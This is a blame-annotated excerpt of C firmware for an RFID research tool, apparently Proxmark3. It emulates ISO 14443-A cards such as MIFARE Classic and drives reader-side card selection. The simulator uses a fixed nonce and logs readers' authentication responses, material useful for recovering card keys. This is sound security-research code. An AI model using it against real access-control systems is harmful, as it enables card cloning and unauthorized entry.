28afbd2b 903int EmSend4bitEx(uint8_t resp, int correctionNeeded);
904int EmSend4bit(uint8_t resp);
905int EmSendCmdExPar(uint8_t *resp, int respLen, int correctionNeeded, uint32_t par);
906int EmSendCmdExPar(uint8_t *resp, int respLen, int correctionNeeded, uint32_t par);
907int EmSendCmdEx(uint8_t *resp, int respLen, int correctionNeeded);
908int EmSendCmd(uint8_t *resp, int respLen);
909int EmSendCmdPar(uint8_t *resp, int respLen, uint32_t par);
15c4dc5a 910
911//-----------------------------------------------------------------------------
912// Main loop of simulated tag: receive commands from reader, decide what
913// response to send, and send it.
914//-----------------------------------------------------------------------------
28afbd2b 915void SimulateIso14443aTag(int tagType, int uid_1st, int uid_2nd, byte_t* data)
15c4dc5a 916{
81cd0474 917 // Enable and clear the trace
918 tracing = TRUE;
d19929cb 919 iso14a_clear_trace();
81cd0474 920
15c4dc5a 921 // This function contains the tag emulation
81cd0474 922 uint8_t sak;
923
924 // The first response contains the ATQA (note: bytes are transmitted in reverse order).
925 uint8_t response1[2];
926
927 switch (tagType) {
928 case 1: { // MIFARE Classic
929 // Says: I am Mifare 1k - original line
930 response1[0] = 0x04;
931 response1[1] = 0x00;
932 sak = 0x08;
933 } break;
934 case 2: { // MIFARE Ultralight
935 // Says: I am a stupid memory tag, no crypto
936 response1[0] = 0x04;
937 response1[1] = 0x00;
938 sak = 0x00;
939 } break;
940 case 3: { // MIFARE DESFire
941 // Says: I am a DESFire tag, ph33r me
942 response1[0] = 0x04;
943 response1[1] = 0x03;
944 sak = 0x20;
945 } break;
946 case 4: { // ISO/IEC 14443-4
947 // Says: I am a javacard (JCOP)
948 response1[0] = 0x04;
949 response1[1] = 0x00;
950 sak = 0x28;
951 } break;
952 default: {
953 Dbprintf("Error: unkown tagtype (%d)",tagType);
954 return;
955 } break;
956 }
957
958 // The second response contains the (mandatory) first 24 bits of the UID
959 uint8_t response2[5];
960
961 // Check if the uid uses the (optional) part
962 uint8_t response2a[5];
963 if (uid_2nd) {
964 response2[0] = 0x88;
965 num_to_bytes(uid_1st,3,response2+1);
966 num_to_bytes(uid_2nd,4,response2a);
967 response2a[4] = response2a[0] ^ response2a[1] ^ response2a[2] ^ response2a[3];
968
969 // Configure the ATQA and SAK accordingly
970 response1[0] |= 0x40;
971 sak |= 0x04;
972 } else {
973 num_to_bytes(uid_1st,4,response2);
974 // Configure the ATQA and SAK accordingly
975 response1[0] &= 0xBF;
976 sak &= 0xFB;
977 }
978
979 // Calculate the BitCountCheck (BCC) for the first 4 bytes of the UID.
980 response2[4] = response2[0] ^ response2[1] ^ response2[2] ^ response2[3];
981
982 // Prepare the mandatory SAK (for 4 and 7 byte UID)
983 uint8_t response3[3];
984 response3[0] = sak;
985 ComputeCrc14443(CRC_14443_A, response3, 1, &response3[1], &response3[2]);
986
987 // Prepare the optional second SAK (for 7 byte UID), drop the cascade bit
988 uint8_t response3a[3];
989 response3a[0] = sak & 0xFB;
990 ComputeCrc14443(CRC_14443_A, response3a, 1, &response3a[1], &response3a[2]);
991
254b70a4 992 uint8_t response5[] = { 0x00, 0x00, 0x00, 0x00 }; // Very random tag nonce
993 uint8_t response6[] = { 0x03, 0x3B, 0x00, 0x00, 0x00 }; // dummy ATS (pseudo-ATR), answer to RATS
994 ComputeCrc14443(CRC_14443_A, response6, 3, &response6[3], &response6[4]);
81cd0474 995
3803d529 996 uint8_t *resp = NULL;
254b70a4 997 int respLen;
15c4dc5a 998
81cd0474 999 // Longest possible response will be 16 bytes + 2 CRC = 18 bytes
15c4dc5a 1000 // This will need
1001 // 144 data bits (18 * 8)
1002 // 18 parity bits
1003 // 2 Start and stop
1004 // 1 Correction bit (Answer in 1172 or 1236 periods, see FPGA)
1005 // 1 just for the case
1006 // ----------- +
1007 // 166
1008 //
1009 // 166 bytes, since every bit that needs to be send costs us a byte
1010 //
1011
254b70a4 1012 // Respond with card type
1013 uint8_t *resp1 = (((uint8_t *)BigBuf) + FREE_BUFFER_OFFSET);
1014 int resp1Len;
15c4dc5a 1015
254b70a4 1016 // Anticollision cascade1 - respond with uid
1017 uint8_t *resp2 = (((uint8_t *)BigBuf) + FREE_BUFFER_OFFSET + 166);
1018 int resp2Len;
15c4dc5a 1019
254b70a4 1020 // Anticollision cascade2 - respond with 2nd half of uid if asked
1021 // we're only going to be asked if we set the 1st byte of the UID (during cascade1) to 0x88
1022 uint8_t *resp2a = (((uint8_t *)BigBuf) + 1140);
1023 int resp2aLen;
15c4dc5a 1024
254b70a4 1025 // Acknowledge select - cascade 1
1026 uint8_t *resp3 = (((uint8_t *)BigBuf) + FREE_BUFFER_OFFSET + (166*2));
1027 int resp3Len;
15c4dc5a 1028
254b70a4 1029 // Acknowledge select - cascade 2
1030 uint8_t *resp3a = (((uint8_t *)BigBuf) + FREE_BUFFER_OFFSET + (166*3));
1031 int resp3aLen;
15c4dc5a 1032
254b70a4 1033 // Response to a read request - not implemented atm
1034 uint8_t *resp4 = (((uint8_t *)BigBuf) + FREE_BUFFER_OFFSET + (166*4));
28afbd2b 1035// int resp4Len;
15c4dc5a 1036
254b70a4 1037 // Authenticate response - nonce
1038 uint8_t *resp5 = (((uint8_t *)BigBuf) + FREE_BUFFER_OFFSET + (166*5));
1039 int resp5Len;
15c4dc5a 1040
254b70a4 1041 // Authenticate response - nonce
1042 uint8_t *resp6 = (((uint8_t *)BigBuf) + FREE_BUFFER_OFFSET + (166*6));
1043 int resp6Len;
15c4dc5a 1044
254b70a4 1045 uint8_t *receivedCmd = (((uint8_t *)BigBuf) + RECV_CMD_OFFSET);
1046 int len;
15c4dc5a 1047
1048 // To control where we are in the protocol
1049 int order = 0;
1050 int lastorder;
1051
1052 // Just to allow some checks
1053 int happened = 0;
1054 int happened2 = 0;
1055
81cd0474 1056 int cmdsRecvd = 0;
1057 uint8_t* respdata = NULL;
1058 int respsize = 0;
28afbd2b 1059// uint8_t nack = 0x04;
15c4dc5a 1060
81cd0474 1061 memset(receivedCmd, 0x44, RECV_CMD_SIZE);
15c4dc5a 1062
1063 // Prepare the responses of the anticollision phase
1064 // there will be not enough time to do this at the moment the reader sends it REQA
1065
1066 // Answer to request
1067 CodeIso14443aAsTag(response1, sizeof(response1));
254b70a4 1068 memcpy(resp1, ToSend, ToSendMax); resp1Len = ToSendMax;
15c4dc5a 1069
1070 // Send our UID (cascade 1)
1071 CodeIso14443aAsTag(response2, sizeof(response2));
254b70a4 1072 memcpy(resp2, ToSend, ToSendMax); resp2Len = ToSendMax;
15c4dc5a 1073
1074 // Answer to select (cascade1)
1075 CodeIso14443aAsTag(response3, sizeof(response3));
254b70a4 1076 memcpy(resp3, ToSend, ToSendMax); resp3Len = ToSendMax;
15c4dc5a 1077
1078 // Send the cascade 2 2nd part of the uid
1079 CodeIso14443aAsTag(response2a, sizeof(response2a));
254b70a4 1080 memcpy(resp2a, ToSend, ToSendMax); resp2aLen = ToSendMax;
15c4dc5a 1081
1082 // Answer to select (cascade 2)
1083 CodeIso14443aAsTag(response3a, sizeof(response3a));
254b70a4 1084 memcpy(resp3a, ToSend, ToSendMax); resp3aLen = ToSendMax;
15c4dc5a 1085
1086 // Strange answer is an example of rare message size (3 bits)
8f51ddb0 1087 CodeStrangeAnswerAsTag();
28afbd2b 1088 memcpy(resp4, ToSend, ToSendMax);// resp4Len = ToSendMax;
15c4dc5a 1089
1090 // Authentication answer (random nonce)
1091 CodeIso14443aAsTag(response5, sizeof(response5));
254b70a4 1092 memcpy(resp5, ToSend, ToSendMax); resp5Len = ToSendMax;
15c4dc5a 1093
254b70a4 1094 // dummy ATS (pseudo-ATR), answer to RATS
1095 CodeIso14443aAsTag(response6, sizeof(response6));
1096 memcpy(resp6, ToSend, ToSendMax); resp6Len = ToSendMax;
15c4dc5a 1097
254b70a4 1098 // We need to listen to the high-frequency, peak-detected path.
1099 SetAdcMuxFor(GPIO_MUXSEL_HIPKD);
1100 FpgaSetupSsc();
15c4dc5a 1101
254b70a4 1102 cmdsRecvd = 0;
15c4dc5a 1103
254b70a4 1104 LED_A_ON();
1105 for(;;) {
1106
81cd0474 1107 if(!GetIso14443aCommandFromReader(receivedCmd, &len, RECV_CMD_SIZE)) {
254b70a4 1108 DbpString("button press");
1109 break;
1110 }
28afbd2b 1111
1112 if (tracing) {
1113 LogTrace(receivedCmd,len, 0, Uart.parityBits, TRUE);
1114 }
1115
254b70a4 1116 // doob - added loads of debug strings so we can see what the reader is saying to us during the sim as hi14alist is not populated
1117 // Okay, look at the command now.
1118 lastorder = order;
1119 if(receivedCmd[0] == 0x26) { // Received a REQUEST
15c4dc5a 1120 resp = resp1; respLen = resp1Len; order = 1;
81cd0474 1121 respdata = response1;
1122 respsize = sizeof(response1);
254b70a4 1123 } else if(receivedCmd[0] == 0x52) { // Received a WAKEUP
15c4dc5a 1124 resp = resp1; respLen = resp1Len; order = 6;
81cd0474 1125 respdata = response1;
1126 respsize = sizeof(response1);
254b70a4 1127 } else if(receivedCmd[1] == 0x20 && receivedCmd[0] == 0x93) { // Received request for UID (cascade 1)
15c4dc5a 1128 resp = resp2; respLen = resp2Len; order = 2;
81cd0474 1129 respdata = response2;
1130 respsize = sizeof(response2);
254b70a4 1131 } else if(receivedCmd[1] == 0x20 && receivedCmd[0] == 0x95) { // Received request for UID (cascade 2)
15c4dc5a 1132 resp = resp2a; respLen = resp2aLen; order = 20;
81cd0474 1133 respdata = response2a;
1134 respsize = sizeof(response2a);
254b70a4 1135 } else if(receivedCmd[1] == 0x70 && receivedCmd[0] == 0x93) { // Received a SELECT (cascade 1)
15c4dc5a 1136 resp = resp3; respLen = resp3Len; order = 3;
81cd0474 1137 respdata = response3;
1138 respsize = sizeof(response3);
254b70a4 1139 } else if(receivedCmd[1] == 0x70 && receivedCmd[0] == 0x95) { // Received a SELECT (cascade 2)
15c4dc5a 1140 resp = resp3a; respLen = resp3aLen; order = 30;
81cd0474 1141 respdata = response3a;
1142 respsize = sizeof(response3a);
254b70a4 1143 } else if(receivedCmd[0] == 0x30) { // Received a (plain) READ
28afbd2b 1144// resp = resp4; respLen = resp4Len; order = 4; // Do nothing
1145// respdata = &nack;
1146// respsize = sizeof(nack); // 4-bit answer
1147 EmSendCmdEx(data+(4*receivedCmd[0]),16,false);
254b70a4 1148 Dbprintf("Read request from reader: %x %x",receivedCmd[0],receivedCmd[1]);
28afbd2b 1149 // We already responded, do not send anything with the EmSendCmd14443aRaw() that is called below
1150 respLen = 0;
254b70a4 1151 } else if(receivedCmd[0] == 0x50) { // Received a HALT
17331e14 1152// DbpString("Reader requested we HALT!:");
254b70a4 1153 // Do not respond
1154 resp = resp1; respLen = 0; order = 0;
81cd0474 1155 respdata = NULL;
1156 respsize = 0;
254b70a4 1157 } else if(receivedCmd[0] == 0x60 || receivedCmd[0] == 0x61) { // Received an authentication request
15c4dc5a 1158 resp = resp5; respLen = resp5Len; order = 7;
254b70a4 1159 respdata = response5;
1160 respsize = sizeof(response5);
1161 } else if(receivedCmd[0] == 0xE0) { // Received a RATS request
1162 resp = resp6; respLen = resp6Len; order = 70;
1163 respdata = response6;
1164 respsize = sizeof(response6);
81cd0474 1165 } else {
17331e14 1166 if (order == 7 && len ==8) {
1167 uint32_t nr = bytes_to_num(receivedCmd,4);
1168 uint32_t ar = bytes_to_num(receivedCmd+4,4);
1169 Dbprintf("Auth attempt {nr}{ar}: %08x %08x",nr,ar);
1170 } else {
1171 // Never seen this command before
1172 Dbprintf("Received unknown command (len=%d):",len);
1173 Dbhexdump(len,receivedCmd,false);
1174 }
1175 // Do not respond
1176 resp = resp1; respLen = 0; order = 0;
1177 respdata = NULL;
1178 respsize = 0;
81cd0474 1179 }
15c4dc5a 1180
1181 // Count number of wakeups received after a halt
1182 if(order == 6 && lastorder == 5) { happened++; }
1183
1184 // Count number of other messages after a halt
1185 if(order != 6 && lastorder == 5) { happened2++; }
1186
1187 // Look at last parity bit to determine timing of answer
1188 if((Uart.parityBits & 0x01) || receivedCmd[0] == 0x52) {
1189 // 1236, so correction bit needed
9f693930 1190 //i = 0;
15c4dc5a 1191 }
1192
15c4dc5a 1193 if(cmdsRecvd > 999) {
1194 DbpString("1000 commands later...");
254b70a4 1195 break;
1196 } else {
15c4dc5a 1197 cmdsRecvd++;
1198 }
1199
81cd0474 1200 if(respLen > 0) {
81cd0474 1201 EmSendCmd14443aRaw(resp, respLen, receivedCmd[0] == 0x52);
1202 }
1203
1204 if (tracing) {
81cd0474 1205 if (respdata != NULL) {
1206 LogTrace(respdata,respsize, 0, SwapBits(GetParity(respdata,respsize),respsize), FALSE);
1207 }
4ab4336a 1208 if(traceLen > TRACE_SIZE) {
1209 DbpString("Trace full");
1210 break;
1211 }
81cd0474 1212 }
15c4dc5a 1213
81cd0474 1214 memset(receivedCmd, 0x44, RECV_CMD_SIZE);
254b70a4 1215 }
15c4dc5a 1216
1217 Dbprintf("%x %x %x", happened, happened2, cmdsRecvd);
1218 LED_A_OFF();
1219}
1220
1221//-----------------------------------------------------------------------------
1222// Transmit the command (to the tag) that was placed in ToSend[].
1223//-----------------------------------------------------------------------------
f7e3ed82 1224static void TransmitFor14443a(const uint8_t *cmd, int len, int *samples, int *wait)
15c4dc5a 1225{
1226 int c;
e30c654b 1227
15c4dc5a 1228 FpgaWriteConfWord(FPGA_MAJOR_MODE_HF_ISO14443A | FPGA_HF_ISO14443A_READER_MOD);
e30c654b 1229
15c4dc5a 1230 if (wait)
1231 if(*wait < 10)
1232 *wait = 10;
e30c654b 1233
15c4dc5a 1234 for(c = 0; c < *wait;) {
1235 if(AT91C_BASE_SSC->SSC_SR & (AT91C_SSC_TXRDY)) {
1236 AT91C_BASE_SSC->SSC_THR = 0x00; // For exact timing!
1237 c++;
1238 }
1239 if(AT91C_BASE_SSC->SSC_SR & (AT91C_SSC_RXRDY)) {
f7e3ed82 1240 volatile uint32_t r = AT91C_BASE_SSC->SSC_RHR;
15c4dc5a 1241 (void)r;
1242 }
1243 WDT_HIT();
1244 }
e30c654b 1245
15c4dc5a 1246 c = 0;
1247 for(;;) {
1248 if(AT91C_BASE_SSC->SSC_SR & (AT91C_SSC_TXRDY)) {
1249 AT91C_BASE_SSC->SSC_THR = cmd[c];
1250 c++;
1251 if(c >= len) {
1252 break;
1253 }
1254 }
1255 if(AT91C_BASE_SSC->SSC_SR & (AT91C_SSC_RXRDY)) {
f7e3ed82 1256 volatile uint32_t r = AT91C_BASE_SSC->SSC_RHR;
15c4dc5a 1257 (void)r;
1258 }
1259 WDT_HIT();
1260 }
1261 if (samples) *samples = (c + *wait) << 3;
1262}
1263
15c4dc5a 1264//-----------------------------------------------------------------------------
195af472 1265// Prepare reader command (in bits, support short frames) to send to FPGA
15c4dc5a 1266//-----------------------------------------------------------------------------
195af472 1267void CodeIso14443aBitsAsReaderPar(const uint8_t * cmd, int bits, uint32_t dwParity)
15c4dc5a 1268{
1269 int i, j;
1270 int last;
f7e3ed82 1271 uint8_t b;
e30c654b 1272
15c4dc5a 1273 ToSendReset();
e30c654b 1274
15c4dc5a 1275 // Start of Communication (Seq. Z)
72934aa3 1276 ToSend[++ToSendMax] = SEC_Z;
15c4dc5a 1277 last = 0;
e30c654b 1278
195af472 1279 size_t bytecount = nbytes(bits);
15c4dc5a 1280 // Generate send structure for the data bits
195af472 1281 for (i = 0; i < bytecount; i++) {
15c4dc5a 1282 // Get the current byte to send
1283 b = cmd[i];
195af472 1284 size_t bitsleft = MIN((bits-(i*8)),8);
e30c654b 1285
195af472 1286 for (j = 0; j < bitsleft; j++) {
15c4dc5a 1287 if (b & 1) {
1288 // Sequence X
72934aa3 1289 ToSend[++ToSendMax] = SEC_X;
15c4dc5a 1290 last = 1;
1291 } else {
1292 if (last == 0) {
1293 // Sequence Z
72934aa3 1294 ToSend[++ToSendMax] = SEC_Z;
15c4dc5a 1295 } else {
1296 // Sequence Y
72934aa3 1297 ToSend[++ToSendMax] = SEC_Y;
15c4dc5a 1298 last = 0;
1299 }
1300 }
1301 b >>= 1;
1302 }
e30c654b 1303
195af472 1304 // Only transmit (last) parity bit if we transmitted a complete byte
1305 if (j == 8) {
1306 // Get the parity bit
1307 if ((dwParity >> i) & 0x01) {
1308 // Sequence X
1309 ToSend[++ToSendMax] = SEC_X;
1310 last = 1;
15c4dc5a 1311 } else {
195af472 1312 if (last == 0) {
1313 // Sequence Z
1314 ToSend[++ToSendMax] = SEC_Z;
1315 } else {
1316 // Sequence Y
1317 ToSend[++ToSendMax] = SEC_Y;
1318 last = 0;
1319 }
15c4dc5a 1320 }
1321 }
1322 }
e30c654b 1323
15c4dc5a 1324 // End of Communication
1325 if (last == 0) {
1326 // Sequence Z
72934aa3 1327 ToSend[++ToSendMax] = SEC_Z;
15c4dc5a 1328 } else {
1329 // Sequence Y
72934aa3 1330 ToSend[++ToSendMax] = SEC_Y;
15c4dc5a 1331 last = 0;
1332 }
1333 // Sequence Y
72934aa3 1334 ToSend[++ToSendMax] = SEC_Y;
e30c654b 1335
15c4dc5a 1336 // Just to be sure!
72934aa3 1337 ToSend[++ToSendMax] = SEC_Y;
1338 ToSend[++ToSendMax] = SEC_Y;
1339 ToSend[++ToSendMax] = SEC_Y;
e30c654b 1340
15c4dc5a 1341 // Convert from last character reference to length
1342 ToSendMax++;
1343}
1344
195af472 1345//-----------------------------------------------------------------------------
1346// Prepare reader command to send to FPGA
1347//-----------------------------------------------------------------------------
1348void CodeIso14443aAsReaderPar(const uint8_t * cmd, int len, uint32_t dwParity)
1349{
1350 CodeIso14443aBitsAsReaderPar(cmd,len*8,dwParity);
1351}
1352
9ca155ba
M
1353//-----------------------------------------------------------------------------
1354// Wait for commands from reader
1355// Stop when button is pressed (return 1) or field was gone (return 2)
1356// Or return 0 when command is captured
1357//-----------------------------------------------------------------------------
1358static int EmGetCmd(uint8_t *received, int *len, int maxLen)
1359{
1360 *len = 0;
1361
1362 uint32_t timer = 0, vtime = 0;
1363 int analogCnt = 0;
1364 int analogAVG = 0;
1365
1366 // Set FPGA mode to "simulated ISO 14443 tag", no modulation (listen
1367 // only, since we are receiving, not transmitting).
1368 // Signal field is off with the appropriate LED
1369 LED_D_OFF();
1370 FpgaWriteConfWord(FPGA_MAJOR_MODE_HF_ISO14443A | FPGA_HF_ISO14443A_TAGSIM_LISTEN);
1371
1372 // Set ADC to read field strength
1373 AT91C_BASE_ADC->ADC_CR = AT91C_ADC_SWRST;
1374 AT91C_BASE_ADC->ADC_MR =
1375 ADC_MODE_PRESCALE(32) |
1376 ADC_MODE_STARTUP_TIME(16) |
1377 ADC_MODE_SAMPLE_HOLD_TIME(8);
1378 AT91C_BASE_ADC->ADC_CHER = ADC_CHANNEL(ADC_CHAN_HF);
1379 // start ADC
1380 AT91C_BASE_ADC->ADC_CR = AT91C_ADC_START;
1381
1382 // Now run a 'software UART' on the stream of incoming samples.
1383 Uart.output = received;
1384 Uart.byteCntMax = maxLen;
1385 Uart.state = STATE_UNSYNCD;
1386
1387 for(;;) {
1388 WDT_HIT();
1389
1390 if (BUTTON_PRESS()) return 1;
1391
1392 // test if the field exists
1393 if (AT91C_BASE_ADC->ADC_SR & ADC_END_OF_CONVERSION(ADC_CHAN_HF)) {
1394 analogCnt++;
1395 analogAVG += AT91C_BASE_ADC->ADC_CDR[ADC_CHAN_HF];
1396 AT91C_BASE_ADC->ADC_CR = AT91C_ADC_START;
1397 if (analogCnt >= 32) {
1398 if ((33000 * (analogAVG / analogCnt) >> 10) < MF_MINFIELDV) {
1399 vtime = GetTickCount();
1400 if (!timer) timer = vtime;
1401 // 50ms no field --> card to idle state
1402 if (vtime - timer > 50) return 2;
1403 } else
1404 if (timer) timer = 0;
1405 analogCnt = 0;
1406 analogAVG = 0;
1407 }
1408 }
1409 // transmit none
1410 if(AT91C_BASE_SSC->SSC_SR & (AT91C_SSC_TXRDY)) {
1411 AT91C_BASE_SSC->SSC_THR = 0x00;
1412 }
1413 // receive and test the miller decoding
1414 if(AT91C_BASE_SSC->SSC_SR & (AT91C_SSC_RXRDY)) {
1415 volatile uint8_t b = (uint8_t)AT91C_BASE_SSC->SSC_RHR;
1416 if(MillerDecoding((b & 0xf0) >> 4)) {
1417 *len = Uart.byteCnt;
8f51ddb0 1418 if (tracing) LogTrace(received, *len, GetDeltaCountUS(), Uart.parityBits, TRUE);
9ca155ba
M
1419 return 0;
1420 }
1421 if(MillerDecoding(b & 0x0f)) {
1422 *len = Uart.byteCnt;
8f51ddb0 1423 if (tracing) LogTrace(received, *len, GetDeltaCountUS(), Uart.parityBits, TRUE);
9ca155ba
M
1424 return 0;
1425 }
1426 }
1427 }
1428}
1429
1430static int EmSendCmd14443aRaw(uint8_t *resp, int respLen, int correctionNeeded)
1431{
1432 int i, u = 0;
1433 uint8_t b = 0;
1434
1435 // Modulate Manchester
1436 FpgaWriteConfWord(FPGA_MAJOR_MODE_HF_ISO14443A | FPGA_HF_ISO14443A_TAGSIM_MOD);
1437 AT91C_BASE_SSC->SSC_THR = 0x00;
1438 FpgaSetupSsc();
1439
1440 // include correction bit
1441 i = 1;
1442 if((Uart.parityBits & 0x01) || correctionNeeded) {
1443 // 1236, so correction bit needed
1444 i = 0;
1445 }
1446
1447 // send cycle
1448 for(;;) {
1449 if(AT91C_BASE_SSC->SSC_SR & (AT91C_SSC_RXRDY)) {
1450 volatile uint8_t b = (uint8_t)AT91C_BASE_SSC->SSC_RHR;
1451 (void)b;
1452 }
1453 if(AT91C_BASE_SSC->SSC_SR & (AT91C_SSC_TXRDY)) {
1454 if(i > respLen) {
8f51ddb0 1455 b = 0xff; // was 0x00
9ca155ba
M
1456 u++;
1457 } else {
1458 b = resp[i];
1459 i++;
1460 }
1461 AT91C_BASE_SSC->SSC_THR = b;
1462
1463 if(u > 4) break;
1464 }
1465 if(BUTTON_PRESS()) {
1466 break;
1467 }
1468 }
1469
1470 return 0;
1471}
1472
8f51ddb0
M
1473int EmSend4bitEx(uint8_t resp, int correctionNeeded){
1474 Code4bitAnswerAsTag(resp);
0a39986e 1475 int res = EmSendCmd14443aRaw(ToSend, ToSendMax, correctionNeeded);
8f51ddb0 1476 if (tracing) LogTrace(&resp, 1, GetDeltaCountUS(), GetParity(&resp, 1), FALSE);
0a39986e 1477 return res;
9ca155ba
M
1478}
1479
8f51ddb0
M
1480int EmSend4bit(uint8_t resp){
1481 return EmSend4bitEx(resp, 0);
1482}
1483
1484int EmSendCmdExPar(uint8_t *resp, int respLen, int correctionNeeded, uint32_t par){
1485 CodeIso14443aAsTagPar(resp, respLen, par);
1486 int res = EmSendCmd14443aRaw(ToSend, ToSendMax, correctionNeeded);
1487 if (tracing) LogTrace(resp, respLen, GetDeltaCountUS(), par, FALSE);
1488 return res;
1489}
1490
1491int EmSendCmdEx(uint8_t *resp, int respLen, int correctionNeeded){
1492 return EmSendCmdExPar(resp, respLen, correctionNeeded, GetParity(resp, respLen));
1493}
1494
1495int EmSendCmd(uint8_t *resp, int respLen){
1496 return EmSendCmdExPar(resp, respLen, 0, GetParity(resp, respLen));
1497}
1498
1499int EmSendCmdPar(uint8_t *resp, int respLen, uint32_t par){
1500 return EmSendCmdExPar(resp, respLen, 0, par);
9ca155ba
M
1501}
1502
15c4dc5a 1503//-----------------------------------------------------------------------------
1504// Wait a certain time for tag response
1505// If a response is captured return TRUE
1506// If it takes to long return FALSE
1507//-----------------------------------------------------------------------------
f7e3ed82 1508static int GetIso14443aAnswerFromTag(uint8_t *receivedResponse, int maxLen, int *samples, int *elapsed) //uint8_t *buffer
15c4dc5a 1509{
1510 // buffer needs to be 512 bytes
1511 int c;
1512
1513 // Set FPGA mode to "reader listen mode", no modulation (listen
534983d7 1514 // only, since we are receiving, not transmitting).
1515 // Signal field is on with the appropriate LED
1516 LED_D_ON();
1517 FpgaWriteConfWord(FPGA_MAJOR_MODE_HF_ISO14443A | FPGA_HF_ISO14443A_READER_LISTEN);
15c4dc5a 1518
534983d7 1519 // Now get the answer from the card
1520 Demod.output = receivedResponse;
1521 Demod.len = 0;
1522 Demod.state = DEMOD_UNSYNCD;
15c4dc5a 1523
f7e3ed82 1524 uint8_t b;
15c4dc5a 1525 if (elapsed) *elapsed = 0;
1526
1527 c = 0;
1528 for(;;) {
534983d7 1529 WDT_HIT();
15c4dc5a 1530
534983d7 1531 if(AT91C_BASE_SSC->SSC_SR & (AT91C_SSC_TXRDY)) {
1532 AT91C_BASE_SSC->SSC_THR = 0x00; // To make use of exact timing of next command from reader!!
15c4dc5a 1533 if (elapsed) (*elapsed)++;
534983d7 1534 }
1535 if(AT91C_BASE_SSC->SSC_SR & (AT91C_SSC_RXRDY)) {
1536 if(c < iso14a_timeout) { c++; } else { return FALSE; }
1537 b = (uint8_t)AT91C_BASE_SSC->SSC_RHR;
72934aa3 1538 if(ManchesterDecoding((b>>4) & 0xf)) {
15c4dc5a 1539 *samples = ((c - 1) << 3) + 4;
1540 return TRUE;
1541 }
1542 if(ManchesterDecoding(b & 0x0f)) {
1543 *samples = c << 3;
1544 return TRUE;
1545 }
534983d7 1546 }
1547 }
15c4dc5a 1548}
1549
dfc3c505 1550void ReaderTransmitBitsPar(uint8_t* frame, int bits, uint32_t par)
15c4dc5a 1551{
1552 int wait = 0;
1553 int samples = 0;
dfc3c505 1554
15c4dc5a 1555 // This is tied to other size changes
f7e3ed82 1556 // uint8_t* frame_addr = ((uint8_t*)BigBuf) + 2024;
dfc3c505 1557 CodeIso14443aBitsAsReaderPar(frame,bits,par);
1558
15c4dc5a 1559 // Select the card
e30c654b 1560 TransmitFor14443a(ToSend, ToSendMax, &samples, &wait);
534983d7 1561 if(trigger)
1562 LED_A_ON();
dfc3c505 1563
15c4dc5a 1564 // Store reader command in buffer
dfc3c505 1565 if (tracing) LogTrace(frame,nbytes(bits),0,par,TRUE);
15c4dc5a 1566}
1567
dfc3c505 1568void ReaderTransmitPar(uint8_t* frame, int len, uint32_t par)
1569{
1570 ReaderTransmitBitsPar(frame,len*8,par);
1571}
15c4dc5a 1572
f7e3ed82 1573void ReaderTransmit(uint8_t* frame, int len)
15c4dc5a 1574{
1575 // Generate parity and redirect
dfc3c505 1576 ReaderTransmitBitsPar(frame,len*8,GetParity(frame,len));
15c4dc5a 1577}
1578
f7e3ed82 1579int ReaderReceive(uint8_t* receivedAnswer)
15c4dc5a 1580{
1581 int samples = 0;
20f9a2a1 1582 if (!GetIso14443aAnswerFromTag(receivedAnswer,160,&samples,0)) return FALSE;
15c4dc5a 1583 if (tracing) LogTrace(receivedAnswer,Demod.len,samples,Demod.parityBits,FALSE);
7e758047 1584 if(samples == 0) return FALSE;
1585 return Demod.len;
15c4dc5a 1586}
1587
f89c7050
M
1588int ReaderReceivePar(uint8_t* receivedAnswer, uint32_t * parptr)
1589{
1590 int samples = 0;
1591 if (!GetIso14443aAnswerFromTag(receivedAnswer,160,&samples,0)) return FALSE;
1592 if (tracing) LogTrace(receivedAnswer,Demod.len,samples,Demod.parityBits,FALSE);
1593 *parptr = Demod.parityBits;
1594 if(samples == 0) return FALSE;
1595 return Demod.len;
1596}
1597
7e758047 1598/* performs iso14443a anticolision procedure
534983d7 1599 * fills the uid pointer unless NULL
1600 * fills resp_data unless NULL */
79a73ab2 1601int iso14443a_select_card(byte_t* uid_ptr, iso14a_card_select_t* p_hi14a_card, uint32_t* cuid_ptr) {
ed258538 1602 uint8_t wupa[] = { 0x52 }; // 0x26 - REQA 0x52 - WAKE-UP
1603 uint8_t sel_all[] = { 0x93,0x20 };
1604 uint8_t sel_uid[] = { 0x93,0x70,0x00,0x00,0x00,0x00,0x00,0x00,0x00 };
1605 uint8_t rats[] = { 0xE0,0x80,0x00,0x00 }; // FSD=256, FSDI=8, CID=0
1606 uint8_t* resp = (((uint8_t *)BigBuf) + FREE_BUFFER_OFFSET); // was 3560 - tied to other size changes
79a73ab2 1607 byte_t uid_resp[4];
1608 size_t uid_resp_len;
15c4dc5a 1609
ed258538 1610 uint8_t sak = 0x04; // cascade uid
1611 int cascade_level = 0;
1612 int len;
79a73ab2 1613
ed258538 1614 // Broadcast for a card, WUPA (0x52) will force response from all cards in the field
dfc3c505 1615 ReaderTransmitBitsPar(wupa,7,0);
ed258538 1616 // Receive the ATQA
1617 if(!ReaderReceive(resp)) return 0;
902cb3c0 1618// Dbprintf("atqa: %02x %02x",resp[0],resp[1]);
1619
ed258538 1620 if(p_hi14a_card) {
1621 memcpy(p_hi14a_card->atqa, resp, 2);
79a73ab2 1622 p_hi14a_card->uidlen = 0;
1623 memset(p_hi14a_card->uid,0,10);
1624 }
534983d7 1625
79a73ab2 1626 // clear uid
1627 if (uid_ptr) {
ea73261d 1628 memset(uid_ptr,0,8);
79a73ab2 1629 }
1630
ed258538 1631 // OK we will select at least at cascade 1, lets see if first byte of UID was 0x88 in
1632 // which case we need to make a cascade 2 request and select - this is a long UID
1633 // While the UID is not complete, the 3nd bit (from the right) is set in the SAK.
1634 for(; sak & 0x04; cascade_level++) {
1635 // SELECT_* (L1: 0x93, L2: 0x95, L3: 0x97)
1636 sel_uid[0] = sel_all[0] = 0x93 + cascade_level * 2;
1637
1638 // SELECT_ALL
1639 ReaderTransmit(sel_all,sizeof(sel_all));
1640 if (!ReaderReceive(resp)) return 0;
79a73ab2 1641
ed258538 1642 // First backup the current uid
79a73ab2 1643 memcpy(uid_resp,resp,4);
1644 uid_resp_len = 4;
1645 // Dbprintf("uid: %02x %02x %02x %02x",uid_resp[0],uid_resp[1],uid_resp[2],uid_resp[3]);
1646
20f9a2a1 1647 // calculate crypto UID
79a73ab2 1648 if(cuid_ptr) {
1649 *cuid_ptr = bytes_to_num(uid_resp, 4);
1650 }
e30c654b 1651
ed258538 1652 // Construct SELECT UID command
534983d7 1653 memcpy(sel_uid+2,resp,5);
